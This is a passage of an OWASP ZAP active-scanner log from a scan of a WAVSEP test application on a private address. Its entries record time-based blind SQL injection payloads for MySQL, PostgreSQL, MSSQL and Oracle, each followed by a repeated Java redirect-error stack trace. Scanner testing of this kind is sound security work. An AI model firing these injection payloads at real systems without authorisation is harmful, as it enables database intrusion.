vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))HxXJ)-- IuDa] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))HxXJ)-- IuDa at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 9615=(SELECT 9615 FROM PG_SLEEP(5)) AND (5839=5839] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 9615=(SELECT 9615 FROM PG_SLEEP(5)) AND (5839=5839 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 3929=(SELECT 3929 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 3929=(SELECT 3929 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682471 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 7968=(SELECT 7968 FROM PG_SLEEP(5)) AND ('DUdF'='DUdF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 7968=(SELECT 7968 FROM PG_SLEEP(5)) AND ('DUdF'='DUdF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 1267=(SELECT 1267 FROM PG_SLEEP(5)) AND 'RpRP'='RpRP] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 1267=(SELECT 1267 FROM PG_SLEEP(5)) AND 'RpRP'='RpRP at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682473 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 5751=(SELECT 5751 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 5751=(SELECT 5751 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 7215=(SELECT 7215 FROM PG_SLEEP(5))-- lvuO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 7215=(SELECT 7215 FROM PG_SLEEP(5))-- lvuO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (9897=9897] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (9897=9897 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682475 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682476 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('uDwC'='uDwC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('uDwC'='uDwC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682477 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'cPjh'='cPjh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'cPjh'='cPjh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682478 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682478 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- oUCG] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- oUCG at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9682479 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 9892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(68)||CHR(103)||CHR(72),5) AND (7960=7960] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 